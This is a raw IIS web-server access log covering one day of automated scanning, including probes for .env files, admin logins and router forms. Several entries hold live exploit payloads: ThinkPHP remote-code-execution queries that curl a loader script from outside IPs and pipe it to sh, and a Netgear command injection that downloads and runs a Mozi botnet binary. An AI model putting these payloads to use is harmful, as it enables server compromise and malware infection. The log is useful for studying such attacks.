#Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-11 00:02:13 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-11 00:02:13 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2743.116+Safari/537.36 - 200 0 0 515 2021-03-11 00:12:41 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:71.0)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 2 375 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-11 01:16:06 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-11 01:16:06 192.168.0.14 GET / - 80 - 192.168.0.1 Linux+Gnu+(cow) - 200 0 0 406 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-11 02:51:13 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-11 02:51:13 192.168.0.14 GET /.env - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.129+Safari/537.36 - 404 0 2 453 2021-03-11 02:51:13 192.168.0.14 POST / - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.129+Safari/537.36 - 405 0 1 437 2021-03-11 02:51:15 192.168.0.14 GET /core/.env - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.129+Safari/537.36 - 404 0 2 375 2021-03-11 02:51:15 192.168.0.14 POST / - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.129+Safari/537.36 - 405 0 1 296 2021-03-11 02:51:17 192.168.0.14 GET /app/.env - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.129+Safari/537.36 - 404 0 2 359 2021-03-11 02:51:17 192.168.0.14 POST / - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.129+Safari/537.36 - 405 0 1 312 2021-03-11 02:51:18 192.168.0.14 GET /public/.env - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.129+Safari/537.36 - 404 0 2 328 2021-03-11 02:51:18 192.168.0.14 POST / - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.129+Safari/537.36 - 405 0 1 312 2021-03-11 02:51:42 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:71.0)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 2 171 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-11 03:40:57 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-11 03:40:57 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:71.0)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 2 390 2021-03-11 03:50:43 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:71.0)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 2 187 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-11 04:17:25 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-11 04:17:25 192.168.0.14 GET /login - 80 - 192.168.0.1 - - 404 0 2 531 2021-03-11 04:17:25 192.168.0.14 GET /jenkins/login - 80 - 192.168.0.1 - - 404 0 2 328 2021-03-11 04:17:27 192.168.0.14 GET /manager/html - 80 - 192.168.0.1 Go-http-client/1.1 - 404 0 2 281 2021-03-11 04:17:27 192.168.0.14 GET /wp-login.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 404 0 2 296 2021-03-11 04:17:29 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 200 0 0 296 2021-03-11 04:17:29 192.168.0.14 GET / s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl+--user-agent+curl_tp5+http://194.40.243.98/ldr.sh|sh 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 200 0 0 281 2021-03-11 04:17:35 192.168.0.14 POST /_ignition/execute-solution - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 404 0 2 281 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-11 06:06:31 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-11 06:06:31 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:71.0)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 2 375 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-11 06:26:39 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-11 06:26:39 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.103+Safari/537.36 - 200 0 0 296 2021-03-11 06:30:02 192.168.0.14 GET /setup.cgi next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://123.97.154.172:59070/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 80 - 192.168.0.1 - - 404 0 2 421 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-11 06:55:58 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-11 06:55:58 192.168.0.14 GET /.env - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.129+Safari/537.36 - 404 0 2 343 2021-03-11 06:55:59 192.168.0.14 POST / - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.129+Safari/537.36 - 405 0 1 547 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-11 07:34:05 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-11 07:34:05 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_11_6)+AppleWebKit/601.7.7+(KHTML,+like+Gecko)+Version/9.1.2+Safari/601.7.7 - 200 0 0 593 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-11 08:24:54 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-11 08:24:54 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:71.0)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 2 390 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-11 09:09:06 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-11 09:09:06 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.103+Safari/537.36 - 200 0 0 406 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-11 10:46:26 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-11 10:46:26 192.168.0.14 GET /login - 80 - 192.168.0.1 - - 404 0 2 375 2021-03-11 10:46:26 192.168.0.14 GET /jenkins/login - 80 - 192.168.0.1 - - 404 0 2 187 2021-03-11 10:46:26 192.168.0.14 GET /manager/html - 80 - 192.168.0.1 Go-http-client/1.1 - 404 0 2 171 2021-03-11 10:46:27 192.168.0.14 GET /wp-login.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 404 0 2 171 2021-03-11 10:46:27 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 200 0 0 187 2021-03-11 10:46:27 192.168.0.14 GET / s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl+--user-agent+curl_tp5+http://31.210.20.181/ldr.sh|sh 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 200 0 0 171 2021-03-11 10:46:28 192.168.0.14 POST /_ignition/execute-solution - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 404 0 2 171 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-11 14:00:34 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-11 14:00:34 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+zgrab/0.x - 200 0 0 546 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-11 14:34:45 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-11 14:34:45 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.103+Safari/537.36 - 200 0 0 515 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-11 15:05:03 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-11 15:05:03 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.103+Safari/537.36 - 200 0 0 921 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-11 16:08:02 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-11 16:08:02 192.168.0.14 GET /.env - 80 - 192.168.0.1 Mozilla/5.0+(Linux;+U;+Android+4.4.2;+en-US;+HM+NOTE+1W+Build/KOT49H)+AppleWebKit/534.30+(KHTML,+like+Gecko)+Version/4.0+UCBrowser/11.0.5.850+U3/0.8.0+Mobile+Safari/534.30 - 404 0 2 250 2021-03-11 16:08:02 192.168.0.14 POST / - 80 - 192.168.0.1 Mozilla/5.0+(Linux;+U;+Android+4.4.2;+en-US;+HM+NOTE+1W+Build/KOT49H)+AppleWebKit/534.30+(KHTML,+like+Gecko)+Version/4.0+UCBrowser/11.0.5.850+U3/0.8.0+Mobile+Safari/534.30 - 405 0 1 266 2021-03-11 16:19:08 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:71.0)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 2 250 2021-03-11 16:19:11 192.168.0.14 GET /boaform/admin/formLogin username=user&psd=user 80 - 192.168.0.1 - - 404 0 2 343 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-11 19:34:05 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-11 19:34:04 192.168.0.14 POST /GponForm/diag_Form images/ 80 - 192.168.0.1 Hello,+World - 404 0 2 562 2021-03-11 19:42:16 192.168.0.14 GET /.env - 80 - 192.168.0.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:77.0)+Gecko/20100101+Firefox/77.0 - 404 0 2 234 2021-03-11 19:42:16 192.168.0.14 GET /wp-content/ - 80 - 192.168.0.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:77.0)+Gecko/20100101+Firefox/77.0 - 404 0 2 250 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-11 20:05:26 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-11 20:05:26 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:71.0)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 2 484 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-11 20:22:04 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-11 20:22:04 192.168.0.14 GET /.env - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.129+Safari/537.36 - 404 0 2 218 2021-03-11 20:22:04 192.168.0.14 POST / - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.129+Safari/537.36 - 405 0 1 234 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-11 20:55:52 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-11 20:55:52 192.168.0.14 GET /login - 80 - 192.168.0.1 - - 404 0 2 406 2021-03-11 20:55:52 192.168.0.14 GET /jenkins/login - 80 - 192.168.0.1 - - 404 0 2 218 2021-03-11 20:55:52 192.168.0.14 GET /manager/html - 80 - 192.168.0.1 Go-http-client/1.1 - 404 0 2 218 2021-03-11 20:55:53 192.168.0.14 GET /wp-login.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 404 0 2 234 2021-03-11 20:55:53 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 200 0 0 234 2021-03-11 20:55:53 192.168.0.14 GET / s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl+--user-agent+curl_tp5+http://31.210.20.181/ldr.sh|sh 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 200 0 0 234 2021-03-11 20:55:55 192.168.0.14 POST /_ignition/execute-solution - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 404 0 2 218 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-11 21:51:18 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-11 21:51:18 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2743.116+Safari/537.36 - 200 0 0 296 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-11 22:45:44 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-11 22:45:44 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:8.0)+Gecko/20100101+Firefox/8.0 - 200 0 0 515 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-11 23:59:18 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-11 23:59:18 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.103+Safari/537.36 - 200 0 0 578